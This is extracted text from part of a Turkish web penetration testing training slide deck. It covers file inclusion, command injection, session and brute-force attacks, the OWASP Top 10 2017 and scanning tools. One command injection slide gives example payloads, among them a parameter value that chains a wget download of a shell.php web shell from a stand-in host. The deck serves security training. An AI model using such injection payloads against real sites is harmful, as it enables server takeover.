  157. 157. www.prismacsi.com © All Rights Reserved. 15 7 www.prismacsi.com © All Rights Reserved. 15 7 www.prismacsi.com © All Rights Reserved. 15 7 www.prismacsi.com © All Rights Reserved. 15 7 File Inclusion Zafiyetinin Zararları Nedir? • Zafiyet ile birlikte saldırganlar web uygulamasının çalıştırıldığı uygulama yetkileri dahilinde sistemdeki kritik dosyalara erişim sağlayabilir, buradaki verileri kullanarak sistemi tamamen ele geçirebilir.
  158. 158. www.prismacsi.com © All Rights Reserved. 15 8 www.prismacsi.com © All Rights Reserved. 15 8 www.prismacsi.com © All Rights Reserved. 15 8 www.prismacsi.com © All Rights Reserved. 15 8 File Inclusion Zafiyetinin Çözümü Nedir? • Çağırılan tüm dosyalar için belirli kontroller (istenen dosya yetki seviyesine uyuyor mu? Dosya aynı domainde mi? vb) yapılmalıdır. • Çağırılan dosyalar, sayfalar direk kendi ismiyle birlikte çağırılmamalıdır.
  159. 159. www.prismacsi.com © All Rights Reserved. 15 9 www.prismacsi.com © All Rights Reserved. 15 9 www.prismacsi.com © All Rights Reserved. 15 9 www.prismacsi.com © All Rights Reserved. 15 9 File Inclusion Uygulama
  160. 160. www.prismacsi.com © All Rights Reserved. 16 0 www.prismacsi.com © All Rights Reserved. 16 0 www.prismacsi.com © All Rights Reserved. 16 0 www.prismacsi.com © All Rights Reserved. 16 0 Command Injection Zafiyeti Nedir? • Saldırgan kişilerin, sistem komutu çalıştırılan bölümleri manipüle ederek zararlı sisteme komut çalıştırma işlemidir. • index.php?dosya=flag.txt • index.php?dosya=flag.txt;ls –la • index.php?dosya=flag.txt;wget http://site.com/shell.php
  161. 161. www.prismacsi.com © All Rights Reserved. 16 1 www.prismacsi.com © All Rights Reserved. 16 1 www.prismacsi.com © All Rights Reserved. 16 1 www.prismacsi.com © All Rights Reserved. 16 1 Command Injection Zafiyetinin Sebebi Nedir? • Uygulama üzerinde, sistem komutu çalıştırılan bölümlerde kullanıcıdan gelen verileri yeterli kontrol gerçekleştirmeden çalıştırılması bu zafiyetin ana sebebidir.
  162. 162. www.prismacsi.com © All Rights Reserved. 16 2 www.prismacsi.com © All Rights Reserved. 16 2 www.prismacsi.com © All Rights Reserved. 16 2 www.prismacsi.com © All Rights Reserved. 16 2 Command Injection Zafiyetinin Zararları Nedir? • Bu zafiyet ile sistem kodu çalıştırılabilindiği için sistemin büyük oranda ele geçirilme riski bulunmaktadır. • Kritik seviye bir zafiyettir. • Hacker bilgi ve yetenekleri ile doğru orantılı bir şekilde bu zafiyeti büyük bir koza dönüştürebilir.
  163. 163. www.prismacsi.com © All Rights Reserved. 16 3 www.prismacsi.com © All Rights Reserved. 16 3 www.prismacsi.com © All Rights Reserved. 16 3 www.prismacsi.com © All Rights Reserved. 16 3 Command Injection Zafiyetinin Çözümü Nedir? • Sistem komutu kullanan yerlerde sistem komutu kullanmadan işlerin çözümü araştırılmalı ve mümkünse sistem komutları çalıştırılmadan işlemler yapılmaya çalışılmalı. • Sistem komutu çalıştırılması gereken durumlarda direk olarak sistem komutu kullanmak yerine frameworklerin sağladığı özel fonksiyonlar kullanılmalıdır. • Kullanıcıdan gelen veriler whitelist metoduna göre değerlendirilmeli ve ona göre işleme alınmalıdır.
  164. 164. www.prismacsi.com © All Rights Reserved. 16 4 www.prismacsi.com © All Rights Reserved. 16 4 www.prismacsi.com © All Rights Reserved. 16 4 www.prismacsi.com © All Rights Reserved. 16 4 Command Injection Uygulama
  165. 165. www.prismacsi.com © All Rights Reserved. 16 5 www.prismacsi.com © All Rights Reserved. 16 5 www.prismacsi.com © All Rights Reserved. 16 5 www.prismacsi.com © All Rights Reserved. 16 5 Uygulama Sunucu Zafiyetleri • Web uygulamalarında zafiyetler her zaman kodlardaki açıklıklardan gerçekleşmez. Bazen de uygulama sunucusu üzerinde zafiyet bulunabilir. • Apache - Uygulama • Tomcat - Uygulama • Nginx - Uygulama • IIS - Uygulama
  166. 166. www.prismacsi.com © All Rights Reserved. 16 6 www.prismacsi.com © All Rights Reserved. 16 6 www.prismacsi.com © All Rights Reserved. 16 6 www.prismacsi.com © All Rights Reserved. 16 6 DoS Zafiyetleri • Web uygulamaları üzerinde uygulama sunucusu ve yanlış kodlamaların sebep olduğu Servis Dışı Bırakma zafiyetleri bulunabilir. • MS15-034 IIS DoS Zafiyeti • Mantıksal DoS - Kredi hesaplama örneği • Uygulama
  167. 167. www.prismacsi.com © All Rights Reserved. 16 7 www.prismacsi.com © All Rights Reserved. 16 7 www.prismacsi.com © All Rights Reserved. 16 7 www.prismacsi.com © All Rights Reserved. 16 7 Oturum Yönetiminden Kaynaklanan Zafiyetler • Web uygulaması içerisinde bilindik zafiyetlerin haricinde oturum yönetimi düzgün yapılmazsa bruteforce saldırıları gibi çeşitli yöntemlerle kullanıcıların hesapları ele geçirilebilir. • Basit Session Mekanizması – Bruteforce Uygulama • Session Sabitleme – Uygulama
  168. 168. www.prismacsi.com © All Rights Reserved. 16 8 www.prismacsi.com © All Rights Reserved. 16 8 www.prismacsi.com © All Rights Reserved. 16 8 www.prismacsi.com © All Rights Reserved. 16 8 Brute Force Saldırıları • Birçok web uygulaması kullanıcı giriş bölümü içermektedir. Gerekli önlemler alınmadığı taktirde çeşitli uygulamalar kullanılarak buralara bruteforce saldırıları düzenlenebilir. • Burpsuite Uygulama
  169. 169. www.prismacsi.com © All Rights Reserved. 16 9 www.prismacsi.com © All Rights Reserved. 16 9 www.prismacsi.com © All Rights Reserved. 16 9 www.prismacsi.com © All Rights Reserved. 16 9 OWASP TOP 10 2017
  170. 170. www.prismacsi.com © All Rights Reserved. 17 0 www.prismacsi.com © All Rights Reserved. 17 0 www.prismacsi.com © All Rights Reserved. 17 0 www.prismacsi.com © All Rights Reserved. 17 0 OWASP TOP 10 • A1 - Injection • A2 - Broken Authentication • A3 - Sensitive Data Exposure • A4 - XML External Entities (XXE) • A5 - Broken Access Control • A6 - Security Misconfiguration • A7 - Cross-Site Scripting (XSS) • A8 - Insecure Deserialization • A9 - Using Components with Known Vulnerabilities • A10 - Insufficient Logging & Monitoring
  171. 171. www.prismacsi.com © All Rights Reserved. 17 1 www.prismacsi.com © All Rights Reserved. 17 1 www.prismacsi.com © All Rights Reserved. 17 1 www.prismacsi.com © All Rights Reserved. 17 1 OWASP TOP 10 - A1:Injection • SQL, NoSQL, OS, LDAP injection gibi injection zafiyetleri zararlı içeriklerin uygulama üzerinde direk olarak işlenmesi sonucu ortaya çıkar. Saldırgan kişiler bu zafiyeti kullanarak sistemde yetkisiz bir şekilde işlemler gerçekleştirebilir.
  172. 172. www.prismacsi.com © All Rights Reserved. 17 2 www.prismacsi.com © All Rights Reserved. 17 2 www.prismacsi.com © All Rights Reserved. 17 2 www.prismacsi.com © All Rights Reserved. 17 2 OWASP TOP 10 - A2: Broken Authentication • Uygulama fonksiyonlarındaki yetki kontrolü ve oturum yönetimi bölümlerinin eksik / hatalı yapılması durumunda saldırgan kişilerin bu zafiyetlerden yararlanarak sisteme erişmesine sebep olur.
  173. 173. www.prismacsi.com © All Rights Reserved. 17 3 www.prismacsi.com © All Rights Reserved. 17 3 www.prismacsi.com © All Rights Reserved. 17 3 www.prismacsi.com © All Rights Reserved. 17 3 OWASP TOP 10 - A3:Sensitive Data Exposure • Çoğu web uygulaması ve API’lar finansal bilgiler, kişisel bilgiler gibi hassas bilgieri koruyamazlar. Saldırganlar, kredi kartı sahtekarlığı, kimlik hırsızlığı gibi saldırılar için için zayıf korumalı verileri çalabilir veya değiştirebilir. Hassas veriler saklanırken veya transfer halindeyken ekstra güvenlik önlemleriyle güvenli hale getirilmelidir.
  174. 174. www.prismacsi.com © All Rights Reserved. 17 4 www.prismacsi.com © All Rights Reserved. 17 4 www.prismacsi.com © All Rights Reserved. 17 4 www.prismacsi.com © All Rights Reserved. 17 4 OWASP TOP 10 - A4:XML External Entities (XXE) • Eski ve zayıf ayarlanmış XML işlemcileri, XML dokümanlarını external entity refence yöntemiyle değerlendirir. External entities yerel dosyalara erişim sağlayarak hassas bilgilerin açığa çıkmasına neden olabilir, uzaktan komut çalıştırabilir, port taraması yapabilir ve servis dışı bırakmaya sebep olabilir.
  175. 175. www.prismacsi.com © All Rights Reserved. 17 5 www.prismacsi.com © All Rights Reserved. 17 5 www.prismacsi.com © All Rights Reserved. 17 5 www.prismacsi.com © All Rights Reserved. 17 5 OWASP TOP 10 - A5: Broken Access Control • Sistemde oturum açmış kullanıcıların yetki seviyesi genellikle düzgün bir şekilde control edilmez. Bunun sonucunda saldırgan kişiler başkalarına ait hassas dosyalara erişim sağlayabilir, bilgileri değiştirip silebilir.
  176. 176. www.prismacsi.com © All Rights Reserved. 17 6 www.prismacsi.com © All Rights Reserved. 17 6 www.prismacsi.com © All Rights Reserved. 17 6 www.prismacsi.com © All Rights Reserved. 17 6 OWASP TOP 10 - A6: Security Misconfiguration • Güvenlik ayarlarının doğru yapılandırılmamış olması en sık görülen zafiyetlerden biridir. • Genellikle uygulamaların default ayarlarla kurulu bırakılması, kurulumların tamamlanmadan bırakılması, HTTP headerları gibi bölümlerde bilgi açığa çıkması ya da hata sayfalarının bilgi açığa çıkarması bu zafiyet kapsamına girer.
  177. 177. www.prismacsi.com © All Rights Reserved. 17 7 www.prismacsi.com © All Rights Reserved. 17 7 www.prismacsi.com © All Rights Reserved. 17 7 www.prismacsi.com © All Rights Reserved. 17 7 OWASP TOP 10 - A7: Cross-Site Scripting (XSS) • XSS zafiyetleri, kullanıcıdan gelen güvensiz verilerin herhangi bir kontrolden geçmeden tekrar tarayıcıya yansıtılması sonucu ortaya çıkar. Saldırgan kişiler böylece Javascript gibi tarayıcıda yorumlanan teknolojileri kullanarak kullanıcılara zarar verebilirler.
  178. 178. www.prismacsi.com © All Rights Reserved. 17 8 www.prismacsi.com © All Rights Reserved. 17 8 www.prismacsi.com © All Rights Reserved. 17 8 www.prismacsi.com © All Rights Reserved. 17 8 OWASP TOP 10 - A8: Insecure Deserialization • Güvensiz deserialization genellikle uzaktan kod çalıştırılmasına (RCE)’ye yol açar. Deserialization zafiyetleri RCE ile sonuçlanmasa bile, injection saldırıları ve yetki yükseltme saldırıları gerçekleştirmek için kullanılabilir.
  179. 179. www.prismacsi.com © All Rights Reserved. 17 9 www.prismacsi.com © All Rights Reserved. 17 9 www.prismacsi.com © All Rights Reserved. 17 9 www.prismacsi.com © All Rights Reserved. 17 9 OWASP TOP 10 - A9: Using Components with Known Vulnerabilities • Uygulama içerisinde çalışan eklentiler, kütüphaneler, frameworkler düzgün çalışması yetkili kullanıcı haklarıyla çalıştırılması gerekebilir. Uygulama içerisinde çalışan bu bileşenlerde zafiyet çıkması durumunda saldırganlar sisteme erişebilir ve very çalabilir.
  180. 180. www.prismacsi.com © All Rights Reserved. 18 0 www.prismacsi.com © All Rights Reserved. 18 0 www.prismacsi.com © All Rights Reserved. 18 0 www.prismacsi.com © All Rights Reserved. 18 0 OWASP TOP 10 - A10: Insufficient Logging & Monitoring • İşlemleri loglamanın ve izlemenin yetersiz olduğu durumlarda sisteme sızan saldırganlar sistemlerde uzun süre barınabilir. Sistemlerde uzun süre kalan saldırgan sistemi detaylı bir şekilde inceleyebilir ve yatayda diğer sistemlere sıçrayabilir.
  181. 181. www.prismacsi.com © All Rights Reserved. 18 1 www.prismacsi.com © All Rights Reserved. 18 1 www.prismacsi.com © All Rights Reserved. 18 1 www.prismacsi.com © All Rights Reserved. 18 1 Otomatize Zafiyet Keşfi
  182. 182. www.prismacsi.com © All Rights Reserved. 18 2 www.prismacsi.com © All Rights Reserved. 18 2 www.prismacsi.com © All Rights Reserved. 18 2 www.prismacsi.com © All Rights Reserved. 18 2 Otomatize Zafiyet Keşfi - Netsparker • Netsparker bilinen web uygulama zafiyetlerin çok büyük bir çoğunluğunu test ederek raporlayan ve false pozitif oranı oldukça düşük milli gururumuz olan J mükemmel bir web uygulama zafiyet tarayıcısıdır. • Ücretlidir. • Uygulama
  183. 183. www.prismacsi.com © All Rights Reserved. 18 3 www.prismacsi.com © All Rights Reserved. 18 3 www.prismacsi.com © All Rights Reserved. 18 3 www.prismacsi.com © All Rights Reserved. 18 3 Otomatize Zafiyet Keşfi - Acunetix • Web uygulama zafiyet tarayıcısıdır. • Ücretlidir. • Uygulama
  184. 184. www.prismacsi.com © All Rights Reserved. 18 4 www.prismacsi.com © All Rights Reserved. 18 4 www.prismacsi.com © All Rights Reserved. 18 4 www.prismacsi.com © All Rights Reserved. 18 4 Otomatize Zafiyet Keşfi - Burpsuite • Burpsuite çoğunlukla web proxy olarak kullanılan fakat Pro sürümüyle birlikte birçok zafiyeti otomatize olarak tespit edebilen çok kullanışlı bir araçtır. • Tarama işlemi yalnızca ücretli olan Pro sürümünde bulunmaktadır.
  185. 185. www.prismacsi.com © All Rights Reserved. 18 5 www.prismacsi.com © All Rights Reserved. 18 5 www.prismacsi.com © All Rights Reserved. 18 5 www.prismacsi.com © All Rights Reserved. 18 5 Otomatize Zafiyet Keşfi - Arachni • Arachni open-source olarak geliştirilen, web arayüzü bulunan bir web uygulama güvenlik tarayıcısıdır.
  186. 186. www.prismacsi.com © All Rights Reserved. 18 6 www.prismacsi.com © All Rights Reserved. 18 6 www.prismacsi.com © All Rights Reserved. 18 6 www.prismacsi.com © All Rights Reserved. 18 6 Otomatize Zafiyet Keşfi - Nessus • Nessus web uygulama testlerinde genellikle web uygulama sunucusunun güvenliği test etmek için kullanılan bir üründür. • Ücretli sürümünün yanında Ücretsiz sürümleri bulunmaktadır. • Uygulama
  187. 187. www.prismacsi.com © All Rights Reserved. 18 7 www.prismacsi.com © All Rights Reserved. 18 7 www.prismacsi.com © All Rights Reserved. 18 7 www.prismacsi.com © All Rights Reserved. 18 7 Otomatize Zafiyet Keşfi - Nikto • Komut satırı üzerinden çalışan oldukça kullanışlı bir web uygulama güvenlik tarayıcısıdır. • Uygulama
  188. 188. www.prismacsi.com © All Rights Reserved. 18 8 www.prismacsi.com © All Rights Reserved. 18 8 www.prismacsi.com © All Rights Reserved. 18 8 www.prismacsi.com © All Rights Reserved. 18 8 Sık Kullanılan Diğer Araçlar
  189. 189. www.prismacsi.com © All Rights Reserved. 18 9 www.prismacsi.com © All Rights Reserved. 18 9 www.prismacsi.com © All Rights Reserved. 18 9 www.prismacsi.com © All Rights Reserved. 18 9 Araçlar - wfuzz • URL Fuzzing için kullanılır. • Komut satırında çalışır. • wfuzz -z list,robots.txt https://www.prismacsi.com/FUZZ • Uygulama
  190. 190. www.prismacsi.com © All Rights Reserved. 19 0 www.prismacsi.com © All Rights Reserved. 19 0 www.prismacsi.com © All Rights Reserved. 19 0 www.prismacsi.com © All Rights Reserved. 19 0 Araçlar - dirbuster • URL Fuzzing için kullanılır. • Be Recursive kapatılması önerilir. • Uygulama
  191. 191. www.prismacsi.com © All Rights Reserved. 19 1 www.prismacsi.com © All Rights Reserved. 19 1 www.prismacsi.com © All Rights Reserved. 19 1 www.prismacsi.com © All Rights Reserved. 19 1 Araçlar - sslscan • SSL sertifikasının güvenliğini test etmek için kullanılır. • Uygulama
  192. 192. www.prismacsi.com © All Rights Reserved. 19 2 www.prismacsi.com © All Rights Reserved. 19 2 www.prismacsi.com © All Rights Reserved. 19 2 www.prismacsi.com © All Rights Reserved. 19 2 Araçlar - wpscan • Wordpress’e özel geliştirilmiş bir zafiyet tarama aracıdır. • Login bruteforce işlemi gerçekleştirebilir. • Uygulama
  193. 193. www.prismacsi.com © All Rights Reserved. 19 3 www.prismacsi.com © All Rights Reserved. 19 3 www.prismacsi.com © All Rights Reserved. 19 3 www.prismacsi.com © All Rights Reserved. 19 3 Araçlar - whatweb • Site hakkında genel bilgilerin analiz edildiği bir uygulamadır. • Komut satırından çalışır. • Uygulama
  194. 194. www.prismacsi.com © All Rights Reserved. 19 4 www.prismacsi.com © All Rights Reserved. 19 4 www.prismacsi.com © All Rights Reserved. 19 4 www.prismacsi.com © All Rights Reserved. 19 4 Kullanışlı Firefox Eklentileri • Foxy Proxy: Hızlı bir şekilde proxy ayarı yapabilmemizi sağlar. • HackBar: İçerisinde URL en birçok faydalı fonksiyonu bulunan bir eklentidir. • Multi Open: Aynı anda verilen URL listesini sekmelerde sırayla otomatik olarak açar. • ShowIP: Sitenin IP adresini görüntüler. • User Agent Switcher: User Agent değiştirmek için kullanılır. • Wappalyzer: Site içerisinde kullanılan teknolojiler hakkında bilgi verir. • Cookie Manager+: Hızlıca Cookie değiştirmek için kullanılır. • Tamper Data: Sunucuya giden veriyi değiştirip göndermemizi sağlar.
  195. 195. www.prismacsi.com © All Rights Reserved. 19 5 www.prismacsi.com © All Rights Reserved. 19 5 www.prismacsi.com © All Rights Reserved. 19 5 www.prismacsi.com © All Rights Reserved. 19 5 Uygulamalar
  196. 196. www.prismacsi.com © All Rights Reserved. 19 6 www.prismacsi.com © All Rights Reserved. 19 6 www.prismacsi.com © All Rights Reserved. 19 6 www.prismacsi.com © All Rights Reserved. 19 6 Sorular?
  197. 197. www.prismacsi.com © All Rights Reserved. 19 7 www.prismacsi.com © All Rights Reserved. 19 7 www.prismacsi.com © All Rights Reserved. 19 7 www.prismacsi.com © All Rights Reserved. 19 7 www.prismacsi.com info@prismacsi.com 0 850 303 85 35 /prismacsi İletişim

×